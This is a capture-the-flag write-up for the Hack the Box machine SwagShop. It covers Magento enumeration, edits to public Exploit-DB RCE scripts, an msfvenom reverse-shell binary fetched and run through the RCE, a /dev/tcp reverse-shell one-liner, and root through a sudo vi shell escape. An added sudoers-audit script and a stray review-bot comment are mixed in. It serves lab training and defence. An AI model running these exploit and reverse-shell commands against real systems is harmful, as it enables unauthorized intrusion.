[Hack the Box write-up] SwagShop

June 20, 2020


I am a Hack the Box beginner. If you have any corrections, additions, or advice, please leave a comment or reach me on Twitter. さんぽし (@sanpo_shiho) | Twitter

Cheat sheet

I keep a cheat sheet of tool usage and similar notes at the link below; feel free to refer to it. github | sanposhiho/MYCHEATSHEET

About the machine

Difficulty: easy. (screenshot: 2020-06-20 0.04.51.png)


kali@kali:~$ nmap -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 10:12 EDT
Nmap scan report for
Host is up (0.27s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.17 seconds

Investigating port 80


kali@kali:~$ gobuster dir -u  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php,txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
2020/06/18 19:49:21 Starting gobuster
/index.php (Status: 200)
/media (Status: 301)
/includes (Status: 301)
/lib (Status: 301)
/install.php (Status: 200)
/app (Status: 301)
/js (Status: 301)
/api.php (Status: 200)
/shell (Status: 301)
/skin (Status: 301)
/cron.php (Status: 200)
/LICENSE.txt (Status: 200)
/var (Status: 301)
/errors (Status: 301)

(screenshot: 2020-06-19 23.24.26.png)

The directory layout (/app, /skin, /media, /install.php, /LICENSE.txt) and the site itself identify this as a Magento store, so the next step is to look for known Magento exploits.


kali@kali:~$ searchsploit Magento
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting                                                                                                | exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting                                                                                          | exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                                                                                                                                         | exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                                                                                                                                    | exploits/php/webapps/39838.php
Magento CE < - (Authenticated) Remote Code Execution                                                                                                                                      | exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities                                                                                                                                            | exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                                                                                                                                       | exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure                                                                                                                                                         | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                                                                                                                                         | exploits/xml/webapps/37977.py
eBay Magento - PHP FPM XML eXternal Entity Injection                                                                                                                                      | exploits/php/webapps/38573.txt
eBay Magento CE - Unrestricted Cron Script (Code Execution / Denial of Service)                                                                                                           | exploits/php/webapps/38651.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:~$ searchsploit -p 37977
  Exploit: Magento eCommerce - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37977
     Path: /usr/share/exploitdb/exploits/xml/webapps/37977.py
File Type: ASCII text, with CRLF line terminators

Copied EDB-ID #37977's path to the clipboard.



I edit a few things inside 37977.py (remove the stray header text that is not commented out, and replace target.com with the target host).

kali@kali:~$ python 37977.py
Check with creds forme:forme

(screenshot: 2020-06-19 11.33.58.png)

(screenshot: 2020-06-19 11.24.13.png)

Logged in to the admin panel with forme:forme.



kali@kali:~$ searchsploit -p 37811
  Exploit: Magento CE < - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37811
     Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied EDB-ID #37811's path to the clipboard.

I use this one. This exploit throws all kinds of errors; the following changes fixed them for me.

Comment out the following two lines. Reference: https://forum.hackthebox.eu/discussion/2304/swagshop-rce

#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.

Change 7d in the URL to 2y (if you open the URL yourself you will see that 7d and 2y are reporting periods: 7 days and 2 years).

- request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+ request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
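Review bot: `2y` replaces `7d` as a hard-coded magic value with nothing in the script saying why the default period fails on this target; add a comment on that line, or take the period from argv the way the URL and command already are, so the next reader does not have to rediscover which line to touch.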
kali@kali:~$ python 37811.py '' "uname -a"
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

RCE works.

Getting a shell

`bash -i >& /dev/tcp/ 0>&1` did not work for me, so I went with uploading an msfvenom-generated binary instead.

kali@kali:~$ msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=1212  -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on port 8000 ... - - [19/Jun/2020 09:53:12] "GET /shell.elf HTTP/1.1" 200 -
kali@kali:~$ python 37811.py '' "wget"

kali@kali:~$ python 37811.py '' "chmod +x ./shell.elf"

kali@kali:~$ python 37811.py '' "./shell.elf"
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST       yes       The listen address (an interface may be specified)
   LPORT  1212             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on
[*] Sending stage (36 bytes) to
[*] Command shell session 1 opened ( -> at 2020-06-19 09:56:01 -0400

Upgrade the session to a pty:

python3 -c 'import pty; pty.spawn("/bin/bash")'


www-data@swagshop:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/index.php

Spawning a shell from inside vi (for example with `:!/bin/bash`):

 * Magento
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to [email protected] so we can send you a copy immediately.
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magentocommerce.com for more information.
 * @category   Mage
 * @package    Mage

and you get root.

# whoami
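The sudoers entry above has two independent weaknesses: vi has a shell escape, and the argument pattern `/var/www/html/*` is a glob that sudo matches with fnmatch(3) without FNM_PATHNAME, so `*` also spans `/` and `/var/www/html/../../../etc/sudoers` satisfies the rule. The following script is an added example, not part of the original write-up, that checks a `sudo -l` style command spec for both properties; the list of shell-escaping editors and the probe path are my own choices.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): audit a sudoers command spec such as
# "(root) NOPASSWD: /usr/bin/vi /var/www/html/*" for the two properties that
# turn it into a root shell:
#   1. the binary is an editor/pager with a shell escape (vi: ":!sh");
#   2. the argument is a glob, and sudo matches it with fnmatch(3) without
#      FNM_PATHNAME, so "*" also matches "/" and ".." escapes the directory.

# Programs documented to hand the user a shell (assumed, GTFOBins-style list).
SHELL_ESCAPERS="vi vim view vimdiff nvim ex nano less more man"

# is_shell_escaper PATH -> exit 0 if PATH's basename is on the list above.
is_shell_escaper() {
    local cmd e
    cmd=$(basename "$1")
    for e in $SHELL_ESCAPERS; do
        [ "$cmd" = "$e" ] && return 0
    done
    return 1
}

# sudo_glob_matches PATTERN ARG -> exit 0 if ARG matches PATTERN the way sudo
# does: a shell pattern in which "*" may span "/". The shell's own `case`
# pattern matching has exactly those semantics, so it is reused here.
sudo_glob_matches() {
    local pattern=$1 arg=$2
    case $arg in
        $pattern) return 0 ;;
    esac
    return 1
}

# audit_rule CMD ARG_PATTERN -> prints one "FINDING:" line per weakness.
audit_rule() {
    local cmd=$1 argpat=$2 probe
    if is_shell_escaper "$cmd"; then
        echo "FINDING: $cmd has a shell escape; sudo on it is a root shell"
    fi
    case $argpat in
        *\**)
            # Walk out of the intended directory with ".." and check whether
            # the rule still matches (constructed probe path).
            probe="${argpat%\*}../../../etc/sudoers"
            if sudo_glob_matches "$argpat" "$probe"; then
                echo "FINDING: '$argpat' also matches '$probe' (wildcard spans '/')"
            fi
            ;;
    esac
}

# count_findings CMD ARG_PATTERN -> number of FINDING lines, on stdout.
count_findings() {
    audit_rule "$1" "$2" | grep -c '^FINDING:'
}

# The rule from this box, as printed by `sudo -l`.
audit_rule /usr/bin/vi '/var/www/html/*'
```

Both findings apply to the rule on this box. The usual fixes are `sudoedit` (the editor runs as the invoking user and only the copy-back is privileged), an explicit file list instead of a trailing `*`, and the `NOEXEC:` tag so the editor cannot exec a child shell.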


The privilege escalation was the textbook kind. Modifying 37977.py was the hard part...

Another way to get a shell

Not really a different method, but using linux/x86/shell_reverse_tcp as the payload gives a stable shell with plain nc as well: it is stageless, so unlike the staged shell/reverse_tcp used above it does not need Metasploit's handler to send a second stage.